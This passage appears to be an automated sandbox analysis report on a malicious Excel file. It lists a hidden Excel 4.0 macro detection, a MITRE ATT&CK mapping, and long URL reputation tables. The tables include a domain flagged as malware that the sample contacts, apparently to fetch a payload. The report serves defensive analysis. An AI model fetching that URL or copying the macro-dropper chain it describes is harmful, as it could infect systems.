    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000003.00000002.254491691.0000000000D60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000003.00000002.254491691.0000000000D60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000003.00000002.254491691.0000000000D60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000003.00000002.254491691.0000000000D60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-447482460.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-447482460.xls100%AviraXF/Agent.B2

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://cyh26wcekai02atpeax.com/fera/frid.gif100%Avira URL Cloudmalware
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cyh26wcekai02atpeax.com
    unknown
    unknowntrue
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
        high
        https://login.microsoftonline.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
          high
          https://shell.suite.office.com:1443B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
              high
              https://autodiscover-s.outlook.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                  high
                  https://cdn.entity.B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                        high
                        https://powerlift.acompli.netB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                          high
                          https://cortana.aiB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                    high
                                    https://api.aadrm.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                      high
                                      https://api.microsoftstream.com/api/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                          high
                                          https://cr.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControlB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                              high
                                              https://graph.ppe.windows.netB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptioneventsB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.netB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplateB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetectB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                              high
                                                              https://graph.windows.netB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                          high
                                                                          https://ncus.contentsync.B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://cyh26wcekai02atpeax.com/fera/frid.gifdocument-447482460.xlstrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                      high
                                                                                      https://management.azure.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                  high
                                                                                                  https://api.office.netB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devicesB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorizeB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://staging.cortana.aiB2FA2616-4E04-44C4-B453-68F97B8615EA.1.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
